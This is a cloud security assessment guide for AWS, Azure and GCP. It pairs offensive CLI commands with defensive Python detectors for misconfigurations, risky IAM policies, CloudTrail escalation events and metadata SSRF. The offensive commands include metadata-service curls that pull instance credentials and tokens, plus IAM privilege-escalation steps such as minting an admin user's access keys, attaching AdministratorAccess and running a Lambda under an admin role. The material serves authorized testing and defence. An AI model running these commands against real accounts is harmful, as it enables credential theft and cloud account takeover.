# Exploiting Cloud Platforms
## When to Use

- AWS, Azure, or GCP security assessment
- Cloud misconfiguration exploitation
- S3/Blob/Storage bucket hunting
- Cloud IAM privilege escalation
- Serverless function exploitation
- Cloud metadata service abuse
## AWS Security

### AWS CLI Setup

```bash
# Configure credentials interactively
aws configure

# Or export directly (the values below are the AWS documentation example keys)
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1

# Test credentials
aws sts get-caller-identity

# List available regions
aws ec2 describe-regions
```
### S3 Bucket Enumeration

```bash
# List buckets
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive

# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/

# Check public access (ACL and bucket policy)
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name

# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
```

S3 Bucket Discovery:

```bash
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets

# Tools
# s3scanner
python3 s3scanner.py buckets.txt
# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
```
### IAM Enumeration

```bash
# Current user info
aws sts get-caller-identity

# List IAM users (if allowed)
aws iam list-users

# List user policies (managed and inline)
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username

# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1

# List roles
aws iam list-roles

# List groups
aws iam list-groups
```
### EC2 Enumeration

```bash
# List instances
aws ec2 describe-instances

# Get instance metadata (run from the instance itself)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# List security groups
aws ec2 describe-security-groups

# List key pairs
aws ec2 describe-key-pairs

# List snapshots
aws ec2 describe-snapshots --owner-ids self

# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
```
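The `describe-security-groups` output above is long and easy to misread by eye. The following is an added example (not part of the original page or of any tool it names) that walks that JSON and reports sensitive ports reachable from any address, which is the "Open Security Groups" misconfiguration listed later on this page. The `SENSITIVE_PORTS` table and the sample group definitions are constructed for the example; feed it `aws ec2 describe-security-groups --output json` to run it against real output.

```python
import ipaddress

# Ports that should essentially never be reachable from the whole internet.
SENSITIVE_PORTS = {
    22: "ssh", 3389: "rdp", 1433: "mssql", 3306: "mysql",
    5432: "postgres", 6379: "redis", 9200: "elasticsearch", 27017: "mongodb",
}

def is_world_open(cidr: str) -> bool:
    """True for 0.0.0.0/0 or ::/0, i.e. any source address."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0

def sensitive_ports_in(perm: dict) -> set:
    """Sensitive ports covered by one IpPermission entry.

    IpProtocol "-1" means all traffic, so every sensitive port is exposed;
    ICMP entries (FromPort -1) carry no TCP/UDP ports.
    """
    if perm.get("IpProtocol") == "-1":
        return set(SENSITIVE_PORTS)
    lo, hi = perm.get("FromPort"), perm.get("ToPort")
    if lo is None or hi is None or lo == -1:
        return set()
    return {p for p in SENSITIVE_PORTS if lo <= p <= hi}

def find_open_sensitive_ports(describe_output: dict) -> list:
    """Walk describe-security-groups JSON and list world-open sensitive ports."""
    findings = []
    for sg in describe_output.get("SecurityGroups", []):
        for perm in sg.get("IpPermissions", []):
            sources = [r["CidrIp"] for r in perm.get("IpRanges", [])]
            sources += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
            public = [s for s in sources if is_world_open(s)]
            if not public:
                continue
            for port in sorted(sensitive_ports_in(perm)):
                findings.append({
                    "group": sg["GroupId"], "name": sg.get("GroupName", ""),
                    "port": port, "service": SENSITIVE_PORTS[port], "source": public[0],
                })
    return findings

# Constructed sample resembling describe-security-groups output (not real account data).
SAMPLE = {"SecurityGroups": [
    {"GroupId": "sg-0123456789abcdef0", "GroupName": "web", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
    ]},
    {"GroupId": "sg-0fedcba9876543210", "GroupName": "db", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
         "IpRanges": [{"CidrIp": "10.0.0.0/16"}], "Ipv6Ranges": []},
        {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]},
    ]},
]}

if __name__ == "__main__":
    for f in find_open_sensitive_ports(SAMPLE):
        print(f"{f['group']} ({f['name']}): {f['service']}/{f['port']} open to {f['source']}")
```

HTTPS on 0.0.0.0/0 is deliberately not reported (it is the expected shape of a web group); the all-traffic IPv6 rule on the database group is what turns one line of output into eight findings, which is the case that reviewers skimming the CLI output tend to miss.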
### Lambda Functions

```bash
# List functions
aws lambda list-functions

# Get function code (returns a pre-signed download URL)
aws lambda get-function --function-name function-name

# Invoke function
aws lambda invoke --function-name function-name output.txt

# Get function configuration (runtime, role, environment variables)
aws lambda get-function-configuration --function-name function-name
```
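`list-functions` and `get-function-configuration` both return the function's environment variables, and "Lambda functions with secrets in environment variables" is one of the quick wins listed further down. Below is an added example (my own code, not from the page or from any tool it mentions) that scans `aws lambda list-functions --output json` for variables that look like embedded credentials, while skipping references to Secrets Manager or SSM, which are the correct way to pass secrets. The name patterns, the entropy threshold and the sample functions are constructed assumptions; the `Functions[].Environment.Variables` structure is the real output shape.

```python
import math
import re

# Variable names that usually hold credentials, and value patterns that look like real ones.
SUSPICIOUS_NAMES = re.compile(r"(secret|passw(or)?d|token|api[_-]?key|private[_-]?key|credential)", re.I)
AWS_ACCESS_KEY = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")
# Values that point at a secret store rather than carrying the secret itself.
SAFE_VALUE_PREFIXES = ("arn:aws:secretsmanager:", "arn:aws:ssm:", "/aws/reference/secretsmanager/")

def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking credentials score high, words and placeholders low."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def classify_env_var(name: str, value: str):
    """Return a reason string if the variable looks like an embedded secret, else None."""
    if value.startswith(SAFE_VALUE_PREFIXES):
        return None
    if AWS_ACCESS_KEY.search(value):
        return "AWS access key id in value"
    if SUSPICIOUS_NAMES.search(name) and len(value) >= 12 and shannon_entropy(value) > 3.5:
        return "high-entropy value under a credential-like name"
    return None

def scan_functions(list_functions_output: dict) -> list:
    """Walk list-functions JSON and report environment variables that look like secrets."""
    findings = []
    for fn in list_functions_output.get("Functions", []):
        env = (fn.get("Environment") or {}).get("Variables") or {}
        for key, value in env.items():
            reason = classify_env_var(key, str(value))
            if reason:
                findings.append({"function": fn["FunctionName"], "variable": key, "reason": reason})
    return findings

# Constructed sample (hypothetical functions; the AKIA value is the AWS documentation example key).
SAMPLE_FUNCTIONS = {"Functions": [
    {"FunctionName": "order-api", "Environment": {"Variables": {
        "DB_PASSWORD": "Tr0ub4dor&3xample!Q",
        "DB_SECRET_ARN": "arn:aws:secretsmanager:us-east-1:123456789012:secret:db-abc123",
        "LOG_LEVEL": "info"}}},
    {"FunctionName": "image-resizer", "Environment": {"Variables": {
        "AWS_KEY": "AKIAIOSFODNN7EXAMPLE"}}},
    {"FunctionName": "nightly-report", "Environment": {"Variables": {
        "BUCKET": "company-reports", "API_TOKEN": "changeme"}}},
    {"FunctionName": "no-env"},
]}

if __name__ == "__main__":
    for f in scan_functions(SAMPLE_FUNCTIONS):
        print(f"{f['function']}: {f['variable']} ({f['reason']})")
```

The entropy gate is there to cut noise, so a short placeholder such as `changeme` is not reported even under a credential-like name; a reviewer who wants those too can drop the length and entropy checks and accept the extra false positives.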
### RDS Enumeration

```bash
# List DB instances
aws rds describe-db-instances

# List DB snapshots
aws rds describe-db-snapshots

# Check which instances are publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
```
### Secrets Manager

```bash
# List secrets
aws secretsmanager list-secrets

# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
```
### CloudTrail (Logging)

```bash
# Check if CloudTrail is enabled
aws cloudtrail describe-trails

# Check trail status
aws cloudtrail get-trail-status --name trail-name

# Get recent management events (last 90 days)
aws cloudtrail lookup-events
```
### AWS Privilege Escalation

Common Misconfigurations:

```bash
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
```
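The permissions in that list are easy to grant by accident through wildcards such as `iam:*` or `iam:Create*`. The following added example (my own code, not from the page) checks a policy document, as returned by `get-policy-version` or `get-user-policy`, for the escalation permissions listed above, expanding wildcards the way IAM does (case-insensitive, `*` matches any run of characters) and honouring explicit Deny statements. The descriptions, the sample policy and the combination table are constructed assumptions; Resource, Condition and NotAction are deliberately not evaluated, so a hit still needs manual review and a NotAction-based grant would be missed.

```python
import fnmatch

# IAM permissions that, on their own, let a principal raise its own privileges.
ESCALATION_ACTIONS = {
    "iam:CreatePolicyVersion": "rewrite a customer-managed policy and make the new version default",
    "iam:SetDefaultPolicyVersion": "switch a policy back to an older, broader version",
    "iam:AttachUserPolicy": "attach a managed policy such as AdministratorAccess to a user",
    "iam:PutUserPolicy": "add an inline policy to a user",
    "iam:CreateAccessKey": "mint access keys for another user",
    "iam:UpdateAssumeRolePolicy": "edit a role's trust policy so new principals can assume it",
}
# Combinations that are dangerous only together.
ESCALATION_COMBOS = [
    ({"iam:PassRole", "lambda:CreateFunction"}, "run code under an arbitrary role via Lambda"),
]

def _as_list(x):
    """IAM allows a single string or a list in Statement, Action and Principal fields."""
    return x if isinstance(x, list) else [x]

def _split_statements(policy: dict):
    """Collect Allow and Deny action patterns from a policy document."""
    allows, denies = [], []
    for st in _as_list(policy.get("Statement", [])):
        target = allows if st.get("Effect") == "Allow" else denies
        target.extend(_as_list(st.get("Action", [])))
    return allows, denies

def _matches(action: str, patterns) -> bool:
    # IAM action names are case-insensitive and accept "*" wildcards ("iam:*", "iam:Create*").
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def policy_grants(policy: dict, action: str) -> bool:
    """Does the policy allow `action`? Resource, Condition and NotAction are not evaluated."""
    allows, denies = _split_statements(policy)
    return _matches(action, allows) and not _matches(action, denies)

def escalation_findings(policy: dict) -> list:
    """(permission, consequence) pairs for every escalation path the policy opens."""
    findings = [(a, why) for a, why in ESCALATION_ACTIONS.items() if policy_grants(policy, a)]
    for needed, why in ESCALATION_COMBOS:
        if all(policy_grants(policy, a) for a in needed):
            findings.append(("+".join(sorted(needed)), why))
    return findings

# Constructed sample inline policy (hypothetical, not from any real account).
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:Create*", "iam:PassRole", "lambda:*"], "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for permission, why in escalation_findings(SAMPLE_POLICY):
        print(f"{permission}: {why}")
```

On the sample, `iam:Create*` silently includes `iam:CreatePolicyVersion`, and `iam:PassRole` plus `lambda:*` together form the Lambda path, while the explicit Deny correctly removes `iam:CreateAccessKey`. That is the pattern to look for when reviewing policies: a wildcard whose expansion nobody listed.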
Exploitation Examples:

```bash
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user

# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
```
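Every one of those CLI calls lands in CloudTrail (the log the CloudTrail section above enumerates), which makes them detectable. This added example (my own detection logic, not from the page) runs over CloudTrail records, as returned by `lookup-events` or read from the S3 trail, and raises an alert for each escalation pattern shown: keys created for a different user, AdministratorAccess attached, trust or policy-version changes, and a function invoked shortly after being created. The sample records are constructed; `CreateFunction20150331` is the real CloudTrail event name for `lambda:CreateFunction`, and the ten-minute window is an assumption to tune.

```python
from datetime import datetime, timedelta

ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"
# IAM calls rare enough in normal operations to alert on every success.
ALWAYS_ALERT = {"UpdateAssumeRolePolicy", "SetDefaultPolicyVersion", "CreatePolicyVersion"}
INVOKE_WINDOW = timedelta(minutes=10)

def _actor(rec: dict) -> str:
    ui = rec.get("userIdentity", {})
    return ui.get("userName") or ui.get("arn", "unknown")

def _when(rec: dict) -> datetime:
    return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def detect_privesc(records: list) -> list:
    """Return (actor, description) alerts for the escalation patterns above."""
    alerts = []
    recent_create_fn = {}  # actor -> (time, role) of the last successful CreateFunction
    for rec in sorted(records, key=_when):
        if rec.get("errorCode"):
            continue  # denied attempts deserve their own rule; this one scores successes
        name, actor = rec["eventName"], _actor(rec)
        rp = rec.get("requestParameters") or {}
        if name == "CreateAccessKey" and rp.get("userName") not in (None, actor):
            alerts.append((actor, f"created access key for {rp['userName']}"))
        elif name.startswith("Attach") and name.endswith("Policy") and rp.get("policyArn") == ADMIN_POLICY_ARN:
            alerts.append((actor, f"attached AdministratorAccess via {name}"))
        elif name == "PutUserPolicy" and rp.get("userName") == actor:
            alerts.append((actor, "added an inline policy to its own user"))
        elif name in ALWAYS_ALERT:
            alerts.append((actor, f"{name} on {rp.get('roleName') or rp.get('policyArn')}"))
        elif name.startswith("CreateFunction"):  # logged as CreateFunction20150331
            recent_create_fn[actor] = (_when(rec), rp.get("role"))
        elif name == "Invoke" and actor in recent_create_fn:
            created, role = recent_create_fn[actor]
            if _when(rec) - created <= INVOKE_WINDOW:
                alerts.append((actor, f"invoked {rp.get('functionName')} within "
                                      f"{INVOKE_WINDOW} of creating it with role {role}"))
    return alerts

def _rec(time, name, params, user="dev-user", error=None):
    """Build a minimal constructed CloudTrail record (hypothetical account 123456789012)."""
    r = {"eventTime": time, "eventName": name, "requestParameters": params,
         "userIdentity": {"type": "IAMUser", "userName": user,
                          "arn": f"arn:aws:iam::123456789012:user/{user}"}}
    if error:
        r["errorCode"] = error
    return r

SAMPLE_EVENTS = [
    _rec("2024-01-01T12:00:00Z", "CreateAccessKey", {"userName": "admin-user"}),
    _rec("2024-01-01T12:01:00Z", "AttachUserPolicy", {"userName": "dev-user", "policyArn": ADMIN_POLICY_ARN}),
    _rec("2024-01-01T12:02:00Z", "CreateAccessKey", {"userName": "admin-user"}, user="intern", error="AccessDenied"),
    _rec("2024-01-01T12:03:00Z", "UpdateAssumeRolePolicy", {"roleName": "AdminRole", "policyDocument": "<omitted>"}),
    _rec("2024-01-01T12:05:00Z", "CreateFunction20150331",
         {"functionName": "evil", "role": "arn:aws:iam::123456789012:role/AdminRole"}),
    _rec("2024-01-01T12:06:00Z", "Invoke", {"functionName": "evil"}),
    _rec("2024-01-01T12:07:00Z", "ListBuckets", None),
    _rec("2024-01-01T11:59:00Z", "CreateAccessKey", {}, user="admin-user"),  # own key: routine rotation
]

if __name__ == "__main__":
    for actor, what in detect_privesc(SAMPLE_EVENTS):
        print(f"ALERT {actor}: {what}")
```

Lambda `Invoke` is a data event and is only recorded when data-event logging is enabled on the trail; without it the last rule never fires, which is itself worth checking when reviewing `describe-trails` output.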
## Azure Security

### Azure CLI Setup

```bash
# Login
az login

# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID

# Get current account
az account show

# List subscriptions
az account list
```
### Blob Storage Enumeration

```bash
# List storage accounts
az storage account list

# List containers
az storage container list --account-name accountname

# List blobs
az storage blob list --container-name containername --account-name accountname

# Download blob
az storage blob download --container-name containername --name filename --account-name accountname --file ./filename

# Check public access (properties.publicAccess: "blob", "container" or null)
az storage container show --name containername --account-name accountname

# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
```

Blob Discovery:

```bash
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files
```

```powershell
# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
```
### VM Enumeration

```bash
# List VMs
az vm list

# List VM images
az vm image list

# Get VM details
az vm show --resource-group RG --name VMname

# List NICs
az network nic list

# List public IPs
az network public-ip list
```
### Azure AD Enumeration

```bash
# List users
az ad user list

# Get current user
az ad signed-in-user show

# List groups
az ad group list

# List service principals
az ad sp list

# List applications
az ad app list
```
### Function Apps

```bash
# List function apps
az functionapp list

# Get function app details
az functionapp show --name functionappname --resource-group RG

# List functions
az functionapp function list --name functionappname --resource-group RG

# Zip deployment endpoint (note: config-zip pushes a package to the app; it does not download code)
az functionapp deployment source config-zip --name functionappname --resource-group RG
```
### Key Vault

```bash
# List key vaults
az keyvault list

# List secrets
az keyvault secret list --vault-name vaultname

# Get secret
az keyvault secret show --name secretname --vault-name vaultname
```
### Azure Metadata Service

```bash
# From an Azure VM (the Metadata: true header is mandatory)
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get access token for the VM's managed identity
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```
## GCP Security

### gcloud Setup

```bash
# Login
gcloud auth login

# Login with service account
gcloud auth activate-service-account --key-file=key.json

# Get current account and project
gcloud config list

# List projects
gcloud projects list
```
### Storage Bucket Enumeration

```bash
# List buckets
gsutil ls

# List bucket contents
gsutil ls gs://bucket-name/

# Download files
gsutil cp gs://bucket-name/file.txt ./

# Check bucket permissions (IAM bindings)
gsutil iam get gs://bucket-name/

# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
```
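The public-access checks in the S3, Blob Storage and GCS sections each return a different JSON shape, and the signal is buried in a different field in each. As an added example (my own code, not from the page or from any tool it names), the functions below read those three outputs, `get-bucket-policy` / `get-bucket-acl`, `az storage container show` and `gsutil iam get`, and return exactly the grants that make data reachable by anyone. The sample documents are constructed; the field names and the public group identifiers (`AllUsers`, `AuthenticatedUsers`, `publicAccess`, `allUsers`, `allAuthenticatedUsers`) are the real ones each platform uses.

```python
# Grantee URIs that make an S3 ACL public.
S3_PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
GCS_PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

def _as_list(x):
    return x if isinstance(x, list) else [x]

def _principal_is_anyone(principal) -> bool:
    """Principal "*" or {"AWS": "*"} means every caller, anonymous ones included."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))

def s3_public_statements(policy: dict) -> list:
    """Allow statements open to anyone and not narrowed by a Condition (get-bucket-policy)."""
    out = []
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _principal_is_anyone(st.get("Principal")):
            continue
        if st.get("Condition"):
            continue  # scoped, e.g. to a VPC endpoint: review it, but it is not wide open
        out.append({"sid": st.get("Sid", ""), "actions": _as_list(st.get("Action", []))})
    return out

def s3_public_grants(acl: dict) -> list:
    """ACL grants to the AllUsers / AuthenticatedUsers groups (get-bucket-acl)."""
    return [{"group": S3_PUBLIC_GROUPS[g["Grantee"]["URI"]], "permission": g["Permission"]}
            for g in acl.get("Grants", [])
            if g.get("Grantee", {}).get("Type") == "Group"
            and g["Grantee"].get("URI") in S3_PUBLIC_GROUPS]

def azure_container_public_level(container: dict):
    """'blob' = anonymous object reads, 'container' = anonymous listing as well,
    None = private (az storage container show)."""
    return (container.get("properties") or {}).get("publicAccess")

def gcs_public_bindings(policy: dict) -> list:
    """Bindings to allUsers / allAuthenticatedUsers (gsutil iam get)."""
    out = []
    for b in policy.get("bindings", []):
        members = [m for m in b.get("members", []) if m in GCS_PUBLIC_MEMBERS]
        if members:
            out.append({"role": b["role"], "members": members})
    return out

# Constructed samples (hypothetical bucket names and IDs, not real resources).
SAMPLE_S3_POLICY = {"Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-assets/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": "*",
     "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
]}
SAMPLE_S3_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "0" * 64}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]}
SAMPLE_AZ_CONTAINER = {"name": "assets", "properties": {"publicAccess": "blob"}}
SAMPLE_GCS_POLICY = {"bindings": [
    {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
    {"role": "roles/storage.admin", "members": ["user:admin@example.com"]},
]}

if __name__ == "__main__":
    print("S3 policy:", s3_public_statements(SAMPLE_S3_POLICY))
    print("S3 ACL:", s3_public_grants(SAMPLE_S3_ACL))
    print("Azure container:", azure_container_public_level(SAMPLE_AZ_CONTAINER))
    print("GCS IAM:", gcs_public_bindings(SAMPLE_GCS_POLICY))
```

Two details matter in practice: on S3 the ACL and the policy are independent grants, so a private policy does not cancel a public ACL grant, and AWS Block Public Access at the account or bucket level overrides both, so a positive finding here should be checked against `get-public-access-block` before being reported.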
Bucket Discovery:

```bash
# Common patterns
company-backup
company-data
company_backup
company_data

# GCPBucketBrute
python3 gcpbucketbrute.py -k company
```
### Compute Engine

```bash
# List instances
gcloud compute instances list

# Get instance details
gcloud compute instances describe instance-name --zone=zone

# List disks
gcloud compute disks list

# List snapshots
gcloud compute snapshots list

# List firewall rules
gcloud compute firewall-rules list
```
### IAM Enumeration

```bash
# List service accounts
gcloud iam service-accounts list

# Get project IAM policy
gcloud projects get-iam-policy PROJECT_ID

# List roles
gcloud iam roles list

# Describe role
gcloud iam roles describe roles/editor
```
### Cloud Functions

```bash
# List functions
gcloud functions list

# Describe function
gcloud functions describe function-name --region=region

# Download source code (if accessible; sourceArchiveUrl is populated for 1st gen functions)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
```
### GCP Metadata Service

```bash
# From a GCP VM (the Metadata-Flavor: Google header is mandatory)
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"

# Get access token for the attached service account
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
```
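The EC2, Azure and GCP metadata endpoints above are the usual target when an SSRF bug is used against a cloud-hosted application ("Exposed Metadata - SSRF to cloud metadata services" in the misconfiguration list below). This added example (my own detection logic, not from the page) scans web server access logs for request parameters that point at those endpoints, folding the usual evasions, percent-encoding applied more than once, the decimal, hex and octal integer forms of 169.254.169.254, and the bracketed IPv6 IMDS address, back to a canonical host before matching. The log lines are constructed in Apache combined format; the endpoint names and addresses are the real ones.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlsplit

METADATA_HOSTNAMES = {"metadata.google.internal", "metadata", "169.254.169.254", "fd00:ec2::254"}
LINK_LOCAL_V4 = ipaddress.ip_network("169.254.0.0/16")
IMDS_V6 = ipaddress.ip_address("fd00:ec2::254")
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')

def normalize_host(host: str) -> str:
    """Fold integer IP obfuscations (decimal, hex, octal) back to dotted form; lowercase otherwise."""
    host = host.strip("[]").lower()
    try:
        return str(ipaddress.IPv4Address(int(host, 0)))  # "2852039166", "0xa9fea9fe", "0o25177524776"
    except ValueError:  # not an integer, or out of IPv4 range (AddressValueError is a ValueError)
        pass
    return host

def is_metadata_target(host: str) -> bool:
    """True if the host is a known metadata name or lies in the link-local / IMDS address space."""
    h = normalize_host(host)
    if h in METADATA_HOSTNAMES:
        return True
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return False
    return (ip.version == 4 and ip in LINK_LOCAL_V4) or ip == IMDS_V6

def embedded_urls(request_target: str):
    """Yield query-parameter values that look like URLs, peeling repeated percent-encoding."""
    for _, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        for _ in range(3):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if "://" in value or value.startswith("//"):
            yield value

def flag_metadata_ssrf(log_lines) -> list:
    """Return (client_ip, url) for requests whose parameters point at a metadata endpoint."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for url in embedded_urls(m.group(1)):
            host = urlsplit(url if "://" in url else "http:" + url).hostname
            if host and is_metadata_target(host):
                hits.append((line.split()[0], url))
    return hits

# Constructed access-log sample (hypothetical /fetch endpoint that proxies a user-supplied URL).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /fetch?url=http%3A%2F%2F2852039166%2Flatest%2F HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /fetch?url=http://0xa9fea9fe/latest/meta-data/iam/ HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:12:00:03 +0000] "GET /fetch?url=http://metadata.google.internal/computeMetadata/v1/ HTTP/1.1" 403 0',
    '10.0.0.6 - - [01/Jan/2024:12:00:04 +0000] "GET /fetch?url=http://[fd00:ec2::254]/latest/ HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:05 +0000] "GET /fetch?url=http%253A%252F%252F169.254.169.254%252F HTTP/1.1" 200 512',
    '10.0.0.8 - - [01/Jan/2024:12:00:06 +0000] "GET /fetch?url=https://example.com/feed.xml HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:12:00:07 +0000] "GET /healthz HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for client, url in flag_metadata_ssrf(SAMPLE_LOG):
        print(f"{client} -> {url}")
```

Dotted forms with leading zeros (`0251.0376.0251.0376`) are rejected by `ipaddress` rather than normalized, and DNS names that resolve to the metadata address are invisible to a log scan; both are reasons this belongs next to, not instead of, the platform controls (IMDSv2 with a hop limit of 1 on EC2, the mandatory `Metadata` / `Metadata-Flavor` headers on Azure and GCP) that stop the request at the instance.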
## Cloud Exploitation Tools

AWS:

```bash
# Pacu - AWS exploitation framework
python3 pacu.py

# ScoutSuite - Security auditing
python3 scout.py aws

# Prowler - Security assessment
./prowler -M csv

# WeirdAAL - AWS attack library
python3 weirdAAL.py
```

Azure:

```powershell
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
```

```bash
# ScoutSuite
python3 scout.py azure

# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
```

GCP:

```bash
# ScoutSuite
python3 scout.py gcp

# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
```
## Quick Cloud Wins

AWS:

- Public S3 buckets with sensitive data
- Overly permissive IAM policies
- Unencrypted snapshots
- Public RDS instances
- Lambda functions with secrets in environment variables
- EC2 metadata service abuse (SSRF)

Azure:

- Public blob storage containers
- Overly permissive RBAC
- Exposed Key Vault secrets
- Public-facing VMs with weak credentials
- Function apps with hardcoded secrets

GCP:

- Public storage buckets
- Overly permissive IAM bindings
- Public compute instances
- Service account key exposure
- Cloud Functions with secrets in code
## Common Cloud Misconfigurations

- Public Storage - S3/Blob/GCS buckets with public read/write
- Excessive Permissions - Overly permissive IAM/RBAC policies
- Exposed Secrets - Keys/passwords in code or environment variables
- No MFA - Critical accounts without multi-factor authentication
- Open Security Groups - 0.0.0.0/0 access on sensitive ports
- Unencrypted Data - Storage/databases without encryption
- Default Credentials - Services using default passwords
- Exposed Metadata - SSRF to cloud metadata services
- Public Snapshots - EBS/disk snapshots publicly accessible
- CloudTrail Disabled - No logging of API calls